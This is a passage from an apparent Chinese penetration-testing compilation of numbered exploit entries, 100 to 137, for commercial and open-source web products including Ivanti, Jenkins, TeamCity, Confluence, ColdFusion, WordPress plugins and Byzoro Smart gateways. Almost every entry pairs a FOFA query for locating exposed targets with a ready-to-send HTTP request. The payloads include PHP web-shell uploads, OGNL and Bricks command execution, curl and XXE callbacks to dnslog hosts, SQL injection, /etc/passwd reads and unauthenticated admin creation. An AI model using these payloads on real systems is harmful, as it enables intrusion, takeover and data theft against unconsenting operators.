Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the XML document, which is:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings endpoint cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Byzoro (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百绰) Smart S200 management platform importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64 encoding (not encryption) of the SQL statement; decoded it reads sql=select 1,database(),version(). The endpoint executes whatever statement is supplied and returns the result as an Excel export.
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection (OGNL) code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
The injected OGNL runs the command given in the x parameter and writes its output into the X-Cmd-Response response header, so check the response headers rather than the body.
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served from http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the administration console with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
The ../ segments must reach the server as sent (for example from Burp or with curl --path-as-is); browsers and most HTTP client libraries normalise them away before the request leaves.
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
The external entity forces the XML parser to resolve the dnslog host; a DNS or HTTP hit there confirms that external entities are being processed.
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundary JGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 (2018u17) and earlier, 2021 Update 7 (2021u7) and earlier, 2023 Update 1 (2023u1) and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
The only "authentication" in this request is the attacker-chosen Cookie: user_name=1; user_id=3.
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
Time-based blind injection through the orderBy parameter: the response is delayed by about 3 seconds when the database name is 11 characters long.
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity <= 2023.11.3 authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
The request creates a new user with the SYSTEM_ADMIN role without authenticating; replace <username> and <password> with values of your choice.
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path-traversal variant in the same product; these paths reach admin pages without authentication):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
Error-based injection through the IPAddr field of the addmacbind message: updatexml() reports the database version in the returned error text.
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
Error-based injection through GroupId: the md5 of 102103122 appears in the error text when the injection works.
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
The cors proxy fetches the URL embedded in the path; a DNS hit on the dnslog host confirms the server-side request.
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
